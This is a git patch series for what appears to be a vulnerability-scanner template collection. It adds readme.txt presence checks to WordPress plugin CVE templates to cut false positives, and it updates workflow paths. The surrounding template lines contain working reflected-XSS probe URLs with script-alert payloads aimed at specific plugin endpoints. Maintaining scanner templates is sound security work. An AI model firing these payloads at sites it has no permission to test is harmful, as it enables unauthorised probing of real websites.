From c68dd7249c10c808eb84bd814a7b3086d98c4491 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha Date: Thu, 21 Mar 2024 13:25:50 +0530 Subject: [PATCH 1/7] Wordpress FP Fix --- http/cves/2008/CVE-2008-1061.yaml | 13 +++++++++++++ http/cves/2011/CVE-2011-4624.yaml | 13 +++++++++++++ http/cves/2011/CVE-2011-4926.yaml | 13 +++++++++++++ http/cves/2011/CVE-2011-5179.yaml | 13 +++++++++++++ http/cves/2011/CVE-2011-5181.yaml | 13 +++++++++++++ http/cves/2011/CVE-2011-5265.yaml | 13 +++++++++++++ http/cves/2012/CVE-2012-1835.yaml | 13 +++++++++++++ http/cves/2012/CVE-2012-2371.yaml | 13 +++++++++++++ http/cves/2012/CVE-2012-4242.yaml | 13 +++++++++++++ http/cves/2012/CVE-2012-4273.yaml | 15 +++++++++++++++ http/cves/2012/CVE-2012-4768.yaml | 13 +++++++++++++ http/cves/2012/CVE-2012-5913.yaml | 13 +++++++++++++ http/cves/2013/CVE-2013-2287.yaml | 15 +++++++++++++++ http/cves/2013/CVE-2013-3526.yaml | 19 +++++++++++++++++-- http/cves/2013/CVE-2013-4117.yaml | 13 +++++++++++++ http/cves/2013/CVE-2013-4625.yaml | 13 +++++++++++++ http/cves/2014/CVE-2014-4513.yaml | 13 +++++++++++++ http/cves/2014/CVE-2014-4536.yaml | 16 ++++++++++++++++ http/cves/2014/CVE-2014-4539.yaml | 15 +++++++++++++++ http/cves/2014/CVE-2014-4561.yaml | 15 +++++++++++++++ http/cves/2014/CVE-2014-9094.yaml | 13 +++++++++++++ http/cves/2015/CVE-2015-2755.yaml | 2 +- http/cves/2015/CVE-2015-2807.yaml | 15 +++++++++++++++ http/cves/2015/CVE-2015-4127.yaml | 13 +++++++++++++ http/cves/2015/CVE-2015-6920.yaml | 16 ++++++++++++++++ http/cves/2015/CVE-2015-9414.yaml | 15 +++++++++++++++ http/cves/2016/CVE-2016-1000126.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000127.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000128.yaml | 15 +++++++++++++++ 29 files changed, 389 insertions(+), 3 deletions(-) diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 01fb93065e7..252a27d5194 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -30,7 +30,20 @@ info: product: sniplets_plugin tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Code Snippets' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 0b418552a92..bbb262d5798 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -29,7 +29,20 @@ info: google-query: inurl:"/wp-content/plugins/flash-album-gallery" tags: cve,cve2011,wordpress,xss,wp-plugin,codeasily +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Grand Flagallery' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index ebd2ba8c1f3..b53a51b106f 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -30,7 +30,20 @@ info: google-query: inurl:"/wp-content/plugins/adminimize/" tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Adminimize ===' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index 2a29fe6feaf..1970e394ca8 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -28,7 +28,20 @@ info: google-query: inurl:"/wp-content/plugins/skysa-official/" tags: cve,cve2011,wordpress,xss,wp-plugin,skysa +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Skysa App' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index c270e00d5b2..eec44867529 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -28,7 +28,20 @@ info: google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/" tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'ClickDesk Live Support - Live Chat' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 526dd0b561d..2ffa04fca58 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -27,7 +27,20 @@ info: google-query: inurl:"/wp-content/plugins/featurific-for-wordpress" tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Featurific For Wordpress' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index 30d6376993f..9df25691ce6 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -28,7 +28,20 @@ info: google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar" tags: cve,cve2012,wordpress,xss,wp-plugin,timely +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'All-in-One Event Calendar' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index 3bbd9f4e282..f51ab64d4cc 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -29,7 +29,20 @@ info: product: wp-facethumb tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'WP-FaceThumb ===' + - method: GET path: - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index 39e8de4496b..220149ffbbd 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -26,7 +26,20 @@ info: product: mf_gig_calendar tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'MF Gig Calendar =' + - method: GET path: - '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index 765440b1277..60f2bfa4600 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -30,7 +30,22 @@ info: google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons" tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/2-click-socialmedia-buttons/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '2 Click Social Media Buttons' + - 'Tags:' + condition: and + - method: GET path: - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 2c1869e8f36..cfd7b0b9500 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -29,7 +29,20 @@ info: framework: wordpress tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Download Monitor =' + - method: GET path: - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 6a31eb58753..41d8a0e9d23 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -29,7 +29,20 @@ info: product: wordpress_integrator tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Wordpress Integrator' + - method: GET path: - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E' diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 62a581c8056..e457e6366d0 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -27,7 +27,22 @@ info: google-query: inurl:"/wp-content/plugins/uploader" tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/uploader/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Uploader' + - "Tags:" + condition: and + - method: GET path: - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index a1f1ee49173..365c3e4f0d4 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -29,17 +29,32 @@ info: google-query: inurl:"/wp-content/plugins/trafficanalyzer" tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'traffic analy' + - 'Tags:' + condition: and + - method: GET path: - - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - - "" + - "" - type: word part: header diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index dd674d06dd2..cbb3992cb60 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -30,7 +30,20 @@ info: google-query: inurl:"/wp-content/plugins/category-grid-view-gallery" tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/category-grid-view-gallery/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Category Grid View Gallery =' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 80b13c89041..973fc41b3bf 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -29,7 +29,20 @@ info: google-query: inurl:"/wp-content/plugins/duplicator" tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/duplicator/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Duplicator - WordPress Migration' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index ea24a1ca3b3..b26c389992b 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -28,7 +28,20 @@ info: google-query: inurl:"/wp-content/plugins/activehelper-livehelp" tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'ActiveHelper LiveHelp Live Chat' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&' diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 838be1d297c..44cc10d6c35 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -30,7 +30,23 @@ info: google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/" tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Infusionsoft' + - 'Tags:' + condition: and + case-insensitive: true + - method: GET path: - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 61660a52615..ffa4c553cab 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -28,7 +28,22 @@ info: framework: wordpress tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/movies/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Movies =' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index 47ff1013655..0714a0d867e 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -29,7 +29,22 @@ info: framework: wordpress tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/ultimate-weather-plugin/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Ultimate Weather' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index b679bf8c04c..9deb3e713d4 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -30,7 +30,20 @@ info: google-query: inurl:"/wp-content/plugins/dzs-videogallery" tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/dzs-videogallery/readme HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Video Gallery WordPress DZS' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E' diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index 1a2785e12d4..e073626ec90 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -30,7 +30,7 @@ info: vendor: ab_google_map_travel_project product: ab_google_map_travel framework: wordpress - tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,packetstorm,ab_google_map_travel_project + tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project http: - raw: diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index 99e09c93a49..5fccebee3ba 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -31,7 +31,22 @@ info: google-query: inurl:"/wp-content/plugins/navis-documentcloud" tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/navis-documentcloud/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Navis' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index 4ec174e459c..facbffa56b2 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -30,7 +30,20 @@ info: framework: wordpress tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Church Admin =' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index 0ea24232ea7..7674754044d 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -27,7 +27,23 @@ info: framework: wordpress tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'SourceAfrica' + - 'Tags:' + condition: and + case-insensitive: true + - method: GET path: - "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml index a98f0519d8a..607cb28f098 100644 --- a/http/cves/2015/CVE-2015-9414.yaml +++ b/http/cves/2015/CVE-2015-9414.yaml @@ -31,7 +31,22 @@ info: google-query: inurl:"/wp-content/plugins/wp-symposium" tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'WP Symposium' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index 569ad75a862..66877a05a46 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -31,7 +31,20 @@ info: google-query: inurl:"/wp-content/plugins/admin-font-editor" tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/admin-font-editor/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Admin Font Editor' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index 90f0e968eb7..ecfa30a8cc0 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -29,7 +29,20 @@ info: framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/ajax-random-post/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Ajax Random Post' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000128.yaml b/http/cves/2016/CVE-2016-1000128.yaml index 193a9fefad0..79635dec6c0 100644 --- a/http/cves/2016/CVE-2016-1000128.yaml +++ b/http/cves/2016/CVE-2016-1000128.yaml @@ -27,7 +27,22 @@ info: google-query: inurl:"/wp-content/plugins/anti-plagiarism" tags: cve2016,cve,wordpress,xss,wp-plugin,anti-plagiarism_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/anti-plagiarism/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'anti plagiarism' + - 'Tags:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" From 2413b5c94682651a1573f0d6ebab303a6123bb35 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 21 Mar 2024 13:37:40 +0530 Subject: [PATCH 2/7] misc workflow path update --- workflows/default-application-workflow.yaml | 15 ++------------- 1 file changed, 2 insertions(+), 13 deletions(-) diff --git a/workflows/default-application-workflow.yaml b/workflows/default-application-workflow.yaml index 03b65efc242..c3ea77fcb14 100644 --- a/workflows/default-application-workflow.yaml +++ b/workflows/default-application-workflow.yaml @@ -4,29 +4,18 @@ info: name: Default Web Application Detection author: andydoering description: Detects default installations of web applications + workflows: - template: http/technologies/apache/default-apache-test-all.yaml - - template: http/technologies/apache/xampp-default-page.yaml - - template: http/technologies/microsoft/default-iis7-page.yaml - - template: http/technologies/microsoft/default-windows-server-page.yaml - - template: http/technologies/microsoft/default-microsoft-azure-page.yaml - - template: http/technologies/default-asp-net-page.yaml - - template: http/technologies/nginx/default-nginx-page.yaml - - template: http/technologies/default-lighttpd-page.yaml - - template: http/technologies/default-django-page.yaml - - - template: http/exposures/files/drupal-install.yaml - + - template: http/misconfiguration/installer/drupal-install.yaml - template: http/technologies/oracle/default-oracle-application-page.yaml - - template: http/technologies/ibm/ibm-http-server.yaml - - template: http/technologies/default-detect-generic.yaml From ce3819840cf1550c964a896100be6910b8b68468 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha Date: Tue, 26 Mar 2024 22:56:22 +0530 Subject: [PATCH 3/7] added flow --- http/cves/2016/CVE-2016-1000129.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000130.yaml | 16 ++++++++++++++++ http/cves/2016/CVE-2016-1000131.yaml | 16 ++++++++++++++++ http/cves/2016/CVE-2016-1000132.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000133.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000134.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000135.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000137.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000138.yaml | 12 ++++++++++++ http/cves/2016/CVE-2016-1000140.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000141.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000142.yaml | 15 +++++++++++++++ http/cves/2016/CVE-2016-1000143.yaml | 15 +++++++++++++++ http/cves/2016/CVE-2016-1000146.yaml | 12 ++++++++++++ http/cves/2016/CVE-2016-1000148.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000149.yaml | 15 +++++++++++++++ http/cves/2016/CVE-2016-1000152.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-1000153.yaml | 15 +++++++++++++++ http/cves/2016/CVE-2016-1000154.yaml | 15 +++++++++++++++ http/cves/2016/CVE-2016-1000155.yaml | 13 +++++++++++++ http/cves/2016/CVE-2016-10993.yaml | 16 +++++++++++++++- http/cves/2017/CVE-2017-17043.yaml | 12 ++++++++++++ http/cves/2017/CVE-2017-17059.yaml | 16 ++++++++++++++++ http/cves/2017/CVE-2017-17451.yaml | 13 +++++++++++++ http/cves/2017/CVE-2017-18598.yaml | 13 +++++++++++++ http/cves/2017/CVE-2017-9288.yaml | 15 +++++++++++++++ http/cves/2018/CVE-2018-20462.yaml | 15 +++++++++++++++ http/cves/2019/CVE-2019-14470.yaml | 13 +++++++++++++ http/cves/2019/CVE-2019-15713.yaml | 15 +++++++++++++++ http/cves/2019/CVE-2019-15889.yaml | 15 +++++++++++++++ http/cves/2019/CVE-2019-16332.yaml | 13 +++++++++++++ http/cves/2019/CVE-2019-16525.yaml | 15 +++++++++++++++ http/cves/2019/CVE-2019-16932.yaml | 17 ++++++++++++++++- http/cves/2020/CVE-2020-26153.yaml | 15 +++++++++++++++ http/cves/2020/CVE-2020-29395.yaml | 13 +++++++++++++ 